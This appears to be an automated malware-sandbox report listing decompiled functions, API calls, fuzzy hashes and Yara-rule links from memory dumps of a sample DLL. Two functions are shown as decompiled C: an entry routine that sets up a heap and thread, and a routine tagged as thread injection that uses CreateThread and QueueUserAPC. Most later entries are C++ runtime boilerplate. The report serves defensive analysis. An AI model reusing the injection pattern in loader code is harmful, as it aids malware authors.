Instruction Fuzzy Hash: A42160B160070EAFDB91DFE9C854DAA3BFCFF453447118425E459D7211E730E91AABA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E161AFA, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6e164108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6e16410c;
						if( *0x6e16410c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6e164118;
								if( *0x6e164118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6e16410c);
						}
						HeapDestroy( *0x6e164110);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6e164108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0);
						_t41 = _t18;
						 *0x6e164110 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6e164130 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E6E1612DC(E6E16111A, E6E1615EE(_a12, 1, 0x6e164118, _t41));
							 *0x6e16410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

APIs

InterlockedIncrement.KERNEL32(6E164108), ref: 6E161B1C
HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 6E161B31

Part of subcall function 6E1612DC: CreateThread.KERNEL32 ref: 6E1612F3
Part of subcall function 6E1612DC: QueueUserAPC.KERNEL32(?,00000000,?), ref: 6E161308
Part of subcall function 6E1612DC: GetLastError.KERNEL32(00000000), ref: 6E161313
Part of subcall function 6E1612DC: TerminateThread.KERNEL32(00000000,00000000), ref: 6E16131D
Part of subcall function 6E1612DC: CloseHandle.KERNEL32(00000000), ref: 6E161324
Part of subcall function 6E1612DC: SetLastError.KERNEL32(00000000), ref: 6E16132D

InterlockedDecrement.KERNEL32(6E164108), ref: 6E161B84
SleepEx.KERNEL32(00000064,00000001), ref: 6E161B9E
CloseHandle.KERNEL32 ref: 6E161BBA
HeapDestroy.KERNEL32 ref: 6E161BC6

Memory Dump Source

Source File: 00000006.00000002.521506374.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000006.00000002.521496666.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.521512708.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.521521840.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.521526623.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID:
API String ID: 2110400756-0
Opcode ID: 6749c9981e5194b8ebf9a519ae579101119f1c6f833c4c40b862754a4116d335
Instruction ID: f72f1f4788480c12ed14cc703f51cb125cb8fad8fc0247b7363ce51684700c65
Opcode Fuzzy Hash: 6749c9981e5194b8ebf9a519ae579101119f1c6f833c4c40b862754a4116d335
Instruction Fuzzy Hash: 3E219671700606AFDF809FE9CC9896A7BB4F7767557108429F419D3140E73099AAFB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1612DC, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1612DC(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				long _t11;
				void* _t13;

				_t13 = CreateThread(0, 0, __imp__SleepEx,  *0x6e16414c, 0, _a12);
				if(_t13 != 0 && QueueUserAPC(_v0, _t13, _a4) == 0) {
					_t11 = GetLastError();
					TerminateThread(_t13, _t11);
					CloseHandle(_t13);
					_t13 = 0;
					SetLastError(_t11);
				}
				return _t13;
			}

0x6e1612f9
0x6e1612fd
0x6e161319
0x6e16131d
0x6e161324
0x6e16132b
0x6e16132d
0x6e161333
0x6e161337

APIs

CreateThread.KERNEL32 ref: 6E1612F3
QueueUserAPC.KERNEL32(?,00000000,?), ref: 6E161308
GetLastError.KERNEL32(00000000), ref: 6E161313
TerminateThread.KERNEL32(00000000,00000000), ref: 6E16131D
CloseHandle.KERNEL32(00000000), ref: 6E161324
SetLastError.KERNEL32(00000000), ref: 6E16132D

Memory Dump Source

Source File: 00000006.00000002.521506374.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000006.00000002.521496666.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.521512708.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.521521840.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.521526623.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: 17330f6508ec4bf6c390485a30f0cf5184fbd9c55d5c8b595ba83e02404c9137
Instruction ID: fe8fecd0251f9155c86adf70293d6ad8c747c6e0485e5bf12bdea2df3b5fb166
Opcode Fuzzy Hash: 17330f6508ec4bf6c390485a30f0cf5184fbd9c55d5c8b595ba83e02404c9137
Instruction Fuzzy Hash: 6BF0FE32606A21FBDE925BA08C4CFAEBB69FB9A751F11C404F60591150C731C81AABA5

Uniqueness

Uniqueness Score: -1.00%

Function 6E19F4A3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E19F4AA

Part of subcall function 6E184FEB: _strlen.LIBCMT ref: 6E184FF1

_Getvals.LIBCPMT ref: 6E19F4FC
_Mpunct.LIBCPMT ref: 6E19F537
_Mpunct.LIBCPMT ref: 6E19F551

Strings

$+xv, xrefs: 6E19F55C

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Mpunct$GetvalsH_prolog3_strlen
String ID: $+xv
API String ID: 3541430992-1686923651
Opcode ID: e5a7ec30f302157854eced934e6cab0bb2e5edf71174fbe66b7dff191507c596
Instruction ID: 60107d9ff18ab076fb4958b54da8db144e89a059af177630ca9ac3b84e722bf1
Opcode Fuzzy Hash: e5a7ec30f302157854eced934e6cab0bb2e5edf71174fbe66b7dff191507c596
Instruction Fuzzy Hash: 4C21A3A5504B526FD721CFB4C4907BBBEECBB0C604B14491AE0A9C7A41D734EA81EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E18160C, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E181613
_strlen.LIBCMT ref: 6E181626
__EH_prolog3.LIBCMT ref: 6E181674
_strlen.LIBCMT ref: 6E181688

Strings

cannot use operator[] with a string argument with , xrefs: 6E181680

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: H_prolog3_strlen
String ID: cannot use operator[] with a string argument with
API String ID: 782648989-2766135566
Opcode ID: c3780a6f815228003ee21f270c355b5af82ceb4e7d929662c0912b31f7f31450
Instruction ID: 3848dca7dd5d9c4219c2abf1c031d305effcba53c4caa04298493aed90d804c2
Opcode Fuzzy Hash: c3780a6f815228003ee21f270c355b5af82ceb4e7d929662c0912b31f7f31450
Instruction Fuzzy Hash: 5511A270A002059BDB04DFE8D814AFFBA79AB40754F100A1CE025AA281C7B19AC4ABE5

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DA8CA, Relevance: 7.9, APIs: 5, Instructions: 373timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E1DA94C
_free.LIBCMT ref: 6E1DA970
_free.LIBCMT ref: 6E1DAAFD
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6E1F61D0), ref: 6E1DAB0F
_free.LIBCMT ref: 6E1DACC9

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: _free$InformationTimeZone
String ID:
API String ID: 597776487-0
Opcode ID: 52c715af90620134a22bfd88753714942e0c31bcd38c7fb9a42f57b0d28a57a2
Instruction ID: 0c10d7a81cc5c0084ec38bc40a01086d74896ab69673fe2ffa9a7063b90b864c
Opcode Fuzzy Hash: 52c715af90620134a22bfd88753714942e0c31bcd38c7fb9a42f57b0d28a57a2
Instruction Fuzzy Hash: DFC16A72904205AFDB14CFF8C850ADEBBBEEF16314F244969D491D7280E7358ACAE750

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D0995, Relevance: 7.7, APIs: 5, Instructions: 186COMMON

Download Yara Rule

APIs

Part of subcall function 6E1D1C1E: RtlAllocateHeap.NTDLL(00000000,?), ref: 6E1D1C50

_free.LIBCMT ref: 6E1D0AA4
_free.LIBCMT ref: 6E1D0ABB
_free.LIBCMT ref: 6E1D0AD8
_free.LIBCMT ref: 6E1D0AF3
_free.LIBCMT ref: 6E1D0B0A

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 235ed78fec8e6ed79903b596cb5aece78961dc0a1634845cddaa25dbc688b8dc
Instruction ID: a3a97e66f936e002aa13df797db6e62a2e294e166136d9327b85320cdf67eea7
Opcode Fuzzy Hash: 235ed78fec8e6ed79903b596cb5aece78961dc0a1634845cddaa25dbc688b8dc
Instruction Fuzzy Hash: 0A51E432A00605EFDB10CFA9C840BAA77FAFF54324F144569E409DB290F771E989EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A5DB3, Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1A5DBA
std::_Lockit::_Lockit.LIBCPMT ref: 6E1A5DC4
std::_Facet_Register.LIBCPMT ref: 6E1A5E15
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A5E35
__EH_prolog3.LIBCMT ref: 6E1A5E4F

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$H_prolog3Lockit$Facet_Lockit::_Lockit::~_Register
String ID:
API String ID: 1100962788-0
Opcode ID: 298fb4d03f77fe973d9bd95ddd0bb7c43a5f697d89b931676f020cc4d2c35f4a
Instruction ID: 705a8d9d3385d03cf6f5811d7e5d329cf8c63b84ceecf7f37a0fd48bac123268
Opcode Fuzzy Hash: 298fb4d03f77fe973d9bd95ddd0bb7c43a5f697d89b931676f020cc4d2c35f4a
Instruction Fuzzy Hash: 3D21A479900259DFCF01DFE8C8106FEBBB9AF84314F144919E925AB280CB719AC5EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1914CD, Relevance: 7.6, APIs: 5, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1914D4
std::_Lockit::_Lockit.LIBCPMT ref: 6E1914DE
codecvt.LIBCPMT ref: 6E191518
std::_Facet_Register.LIBCPMT ref: 6E19152F
std::_Lockit::~_Lockit.LIBCPMT ref: 6E19154F

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Registercodecvt
String ID:
API String ID: 738035616-0
Opcode ID: 23178f03d8b9bb05921f547dddfc29f4352deafe1cd36aae9508ab025daf2028
Instruction ID: b56ac000eec935405a4d9785693c7d1441b70ddc16c33e0f4b1c40f14b60fd13
Opcode Fuzzy Hash: 23178f03d8b9bb05921f547dddfc29f4352deafe1cd36aae9508ab025daf2028
Instruction Fuzzy Hash: D811E975B001159BCB05DBE8D810AFD777DAF85714F264819E816AB280CF709EC8FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E18FA20, Relevance: 7.6, APIs: 5, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E18FA27
std::_Lockit::_Lockit.LIBCPMT ref: 6E18FA31
codecvt.LIBCPMT ref: 6E18FA6B
std::_Facet_Register.LIBCPMT ref: 6E18FA82
std::_Lockit::~_Lockit.LIBCPMT ref: 6E18FAA2

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Registercodecvt
String ID:
API String ID: 738035616-0
Opcode ID: 0654fc3634666218949730838d6ed2d5bcff777e7ee1435541cf0c8bea3019f8
Instruction ID: 1a7c17a4ff95586dd976a022b2b0ec220a555b2cdd9b1fd7ed3e39384983d8bd
Opcode Fuzzy Hash: 0654fc3634666218949730838d6ed2d5bcff777e7ee1435541cf0c8bea3019f8
Instruction Fuzzy Hash: E7110B35A002299BCF05DBD4CC14AEE77BDAF88724F244419F825AB280DF749EC4EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E19361B, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E193622
std::_Lockit::_Lockit.LIBCPMT ref: 6E19362C
numpunct.LIBCPMT ref: 6E193666
std::_Facet_Register.LIBCPMT ref: 6E19367D
std::_Lockit::~_Lockit.LIBCPMT ref: 6E19369D

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Registernumpunct
String ID:
API String ID: 3875005873-0
Opcode ID: 590b1d01d92ee8ff5d7b6470e241a0ebe6a3c6fb16e3c86fab8b22143bd1302c
Instruction ID: 0028519176401f016a80325fdffecf9521edcbbbd80284b082ae5a5b868edfb4
Opcode Fuzzy Hash: 590b1d01d92ee8ff5d7b6470e241a0ebe6a3c6fb16e3c86fab8b22143bd1302c
Instruction Fuzzy Hash: CC01C435900516CFCB05DBE4C918AED77BABF84314F244819E829AB380CF309AC5FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E198E37, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E198E3E
std::_Lockit::_Lockit.LIBCPMT ref: 6E198E48
ctype.LIBCPMT ref: 6E198E82
std::_Facet_Register.LIBCPMT ref: 6E198E99
std::_Lockit::~_Lockit.LIBCPMT ref: 6E198EB9

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Registerctype
String ID:
API String ID: 2628141667-0
Opcode ID: 1169c89c785eb03ebc291c45d55f276fc1a1e72dcb9234aeb3c7728ea4412134
Instruction ID: 39386851b63e0e6d124aae01dcb901c93bfb69ba2ab5e600cca973946e8a786b
Opcode Fuzzy Hash: 1169c89c785eb03ebc291c45d55f276fc1a1e72dcb9234aeb3c7728ea4412134
Instruction Fuzzy Hash: 1701C439D00619DFCB05DBE4C8206FEB779AF84314F244809E811AB290CF349AC9FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E19965D, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E199664
std::_Lockit::_Lockit.LIBCPMT ref: 6E19966E
numpunct.LIBCPMT ref: 6E1996A8
std::_Facet_Register.LIBCPMT ref: 6E1996BF
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1996DF

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Registernumpunct
String ID:
API String ID: 3875005873-0
Opcode ID: 2fdfff416599800db40594f42115fd4a91c6b38c83441c6c6a68ddd657012e5b
Instruction ID: 245922cce948cd74e94cef248f2f37043561a4d65e63d741d66994c31787f0b7
Opcode Fuzzy Hash: 2fdfff416599800db40594f42115fd4a91c6b38c83441c6c6a68ddd657012e5b
Instruction Fuzzy Hash: 6E01D6759001198FCF05DBE4C864AFE77B9AF84314F240809E821AB290CF359AC4FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E198ECC, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E198ED3
std::_Lockit::_Lockit.LIBCPMT ref: 6E198EDD
messages.LIBCPMT ref: 6E198F17
std::_Facet_Register.LIBCPMT ref: 6E198F2E
std::_Lockit::~_Lockit.LIBCPMT ref: 6E198F4E

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Registermessages
String ID:
API String ID: 1766764229-0
Opcode ID: e21d6fa7952e304f427934070741eae47f3d3f88944e7e9dae6eb58e8339e977
Instruction ID: 5e076aeb189553285414570725fcfbe19b921862a8ee4b366de0af7591399d3a
Opcode Fuzzy Hash: e21d6fa7952e304f427934070741eae47f3d3f88944e7e9dae6eb58e8339e977
Instruction Fuzzy Hash: AC01C4359005199BCF05DBE4C814AFE77BABF84354F244809E825AB280CF749AC9FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E198F61, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E198F68
std::_Lockit::_Lockit.LIBCPMT ref: 6E198F72
messages.LIBCPMT ref: 6E198FAC
std::_Facet_Register.LIBCPMT ref: 6E198FC3
std::_Lockit::~_Lockit.LIBCPMT ref: 6E198FE3

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Registermessages
String ID:
API String ID: 1766764229-0
Opcode ID: 57283259d4671350a834fe4a64abb74f2088c595764d0295a08d5d6026d2c1db
Instruction ID: 7df3ae128c0745ee1e005bdc67847355afb9dde7f10253f6837f3f8b7440b8fe
Opcode Fuzzy Hash: 57283259d4671350a834fe4a64abb74f2088c595764d0295a08d5d6026d2c1db
Instruction Fuzzy Hash: 2A01C4359005169FCB05DBE4C814AFE777A7F94754F240809E811AB2C0DF3099C8BB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E199409, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E199410
std::_Lockit::_Lockit.LIBCPMT ref: 6E19941A
moneypunct.LIBCPMT ref: 6E199454
std::_Facet_Register.LIBCPMT ref: 6E19946B
std::_Lockit::~_Lockit.LIBCPMT ref: 6E19948B

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Registermoneypunct
String ID:
API String ID: 3502174300-0
Opcode ID: c903effef4c72db7254d461b9342eeac79ed2d5cbf2649f432b4799139f5b443
Instruction ID: 7642f4a12d3c785234d10d811e9be50fb0a5542de51db2306e885ad6f1c017d7
Opcode Fuzzy Hash: c903effef4c72db7254d461b9342eeac79ed2d5cbf2649f432b4799139f5b443
Instruction Fuzzy Hash: 3C01D67590011ACFCB06DBE4C924AFD777A6F94314F244909E821AB380CF309AC4FB52

Uniqueness

Uniqueness Score: -1.00%

Function 6E198C78, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E198C7F
std::_Lockit::_Lockit.LIBCPMT ref: 6E198C89
codecvt.LIBCPMT ref: 6E198CC3
std::_Facet_Register.LIBCPMT ref: 6E198CDA
std::_Lockit::~_Lockit.LIBCPMT ref: 6E198CFA

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Registercodecvt
String ID:
API String ID: 738035616-0
Opcode ID: 2561eee440b68459346c707a01c16628b4a5ee0cd62a98b15f585fffae40ee5a
Instruction ID: 394e12805d4733e4918c964a3baea71fa44e8d2b4192e725d344a79ec5cb6fa7
Opcode Fuzzy Hash: 2561eee440b68459346c707a01c16628b4a5ee0cd62a98b15f585fffae40ee5a
Instruction Fuzzy Hash: 1001D63590051ADFCF05DBE4D814AFD7779AF84314F244809E821AB280CF7099C5FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A5C89, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1A5C90
std::_Lockit::_Lockit.LIBCPMT ref: 6E1A5C9A
moneypunct.LIBCPMT ref: 6E1A5CD4
std::_Facet_Register.LIBCPMT ref: 6E1A5CEB
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A5D0B

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Registermoneypunct
String ID:
API String ID: 3502174300-0
Opcode ID: 58139f290fcc45dffee042b5814e0830010c9a94adb72ba2d21829d79658ac9b
Instruction ID: 943a61ba7dc438d287af88a0061a145d8f19d911c79bc52c60fe55c4d2a9d107
Opcode Fuzzy Hash: 58139f290fcc45dffee042b5814e0830010c9a94adb72ba2d21829d79658ac9b
Instruction Fuzzy Hash: 9A01D6399006199FCF05DBE8C814AFD77B9AF84314F244809E921BB280CF3099C4EB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E198D0D, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E198D14
std::_Lockit::_Lockit.LIBCPMT ref: 6E198D1E
collate.LIBCPMT ref: 6E198D58
std::_Facet_Register.LIBCPMT ref: 6E198D6F
std::_Lockit::~_Lockit.LIBCPMT ref: 6E198D8F

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Registercollate
String ID:
API String ID: 1032263157-0
Opcode ID: 599bf965f27ae60ef5f092832ee5a078307f8c3647e12e63b69e7eb29cb7be72
Instruction ID: fc9f8dec7159ce59476065ed2a94e9b6416dca88f47aba3c0eb6a2ac7f9ac253
Opcode Fuzzy Hash: 599bf965f27ae60ef5f092832ee5a078307f8c3647e12e63b69e7eb29cb7be72
Instruction Fuzzy Hash: 0701D635900219DFCF05DBE4C8546FE77B9AF94714F244809E815AB290CF309AC5FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E198DA2, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E198DA9
std::_Lockit::_Lockit.LIBCPMT ref: 6E198DB3
collate.LIBCPMT ref: 6E198DED
std::_Facet_Register.LIBCPMT ref: 6E198E04
std::_Lockit::~_Lockit.LIBCPMT ref: 6E198E24

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Registercollate
String ID:
API String ID: 1032263157-0
Opcode ID: 0cbddcdb7313549b97ae46eca3e79eb8b31378fcc8f41ed159bcc800b456f399
Instruction ID: b9c5f9ff80df82dcf86efd7d197706c31ee95018ebd097e7722d357b9bc2875e
Opcode Fuzzy Hash: 0cbddcdb7313549b97ae46eca3e79eb8b31378fcc8f41ed159bcc800b456f399
Instruction Fuzzy Hash: 1901C4359001198FCF05DBE4C864AFEB77AAF84314F244909E811AB280CF309EC5FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A5A35, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1A5A3C
std::_Lockit::_Lockit.LIBCPMT ref: 6E1A5A46
messages.LIBCPMT ref: 6E1A5A80
std::_Facet_Register.LIBCPMT ref: 6E1A5A97
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A5AB7

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Registermessages
String ID:
API String ID: 1766764229-0
Opcode ID: 22bc93af3f81e5cf4c30ce545e235092cb173b2b749f30845403a5d5b2760a41
Instruction ID: 3d9988620228243624e55f100f26299a3667a51914be62b074eaf32b7dc1640a
Opcode Fuzzy Hash: 22bc93af3f81e5cf4c30ce545e235092cb173b2b749f30845403a5d5b2760a41
Instruction Fuzzy Hash: FA01C439A00519DFCF05DBE8C8506FE777AAF84314F254809E911AB280CF309DC4EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E19924A, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E199251
std::_Lockit::_Lockit.LIBCPMT ref: 6E19925B
moneypunct.LIBCPMT ref: 6E199295
std::_Facet_Register.LIBCPMT ref: 6E1992AC
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1992CC

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Registermoneypunct
String ID:
API String ID: 3502174300-0
Opcode ID: d7bdb2aa0651d0913fc6dae525a68ba55dde589d35c572c1fdd28524f310ab95
Instruction ID: 362467e3f6c30ec5c52ba7210d1a02f663c517a444eae956154af8f8e17132a0
Opcode Fuzzy Hash: d7bdb2aa0651d0913fc6dae525a68ba55dde589d35c572c1fdd28524f310ab95
Instruction Fuzzy Hash: 0B01C4799005199FCB05DBE4C8246FD7779AF84314F240809E811AB280DF309AC8BB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1992DF, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1992E6
std::_Lockit::_Lockit.LIBCPMT ref: 6E1992F0
moneypunct.LIBCPMT ref: 6E19932A
std::_Facet_Register.LIBCPMT ref: 6E199341
std::_Lockit::~_Lockit.LIBCPMT ref: 6E199361

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Registermoneypunct
String ID:
API String ID: 3502174300-0
Opcode ID: 31b80db62e3a1e49051d40e1ed313247f10c907261c9f1c604848f74c3151aaf
Instruction ID: d788cbee4a1e63204e9d811192541543f6225f3b3f0145b497824c6980705d36
Opcode Fuzzy Hash: 31b80db62e3a1e49051d40e1ed313247f10c907261c9f1c604848f74c3151aaf
Instruction Fuzzy Hash: E301C4359001199FCF05DBE8C8246FE77B9AF94714F244809E815AB2C0CF719AC9FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E199374, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E19937B
std::_Lockit::_Lockit.LIBCPMT ref: 6E199385
moneypunct.LIBCPMT ref: 6E1993BF
std::_Facet_Register.LIBCPMT ref: 6E1993D6
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1993F6

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Registermoneypunct
String ID:
API String ID: 3502174300-0
Opcode ID: 72e6b4df81fca651240c19878939cc4004f9fee940a1570338233f44f8c2fc89
Instruction ID: 9d285fafeaac1ba0abaa64e43ddfcc3a5e286b63f1931e2a9ed5d2d762bcf19d
Opcode Fuzzy Hash: 72e6b4df81fca651240c19878939cc4004f9fee940a1570338233f44f8c2fc89
Instruction Fuzzy Hash: 8301C4359006158FCB05DBE8D8646FE7779BF84354F244909E811AB2C0CF309AC5FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A5BF4, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1A5BFB
std::_Lockit::_Lockit.LIBCPMT ref: 6E1A5C05
moneypunct.LIBCPMT ref: 6E1A5C3F
std::_Facet_Register.LIBCPMT ref: 6E1A5C56
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A5C76

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Registermoneypunct
String ID:
API String ID: 3502174300-0
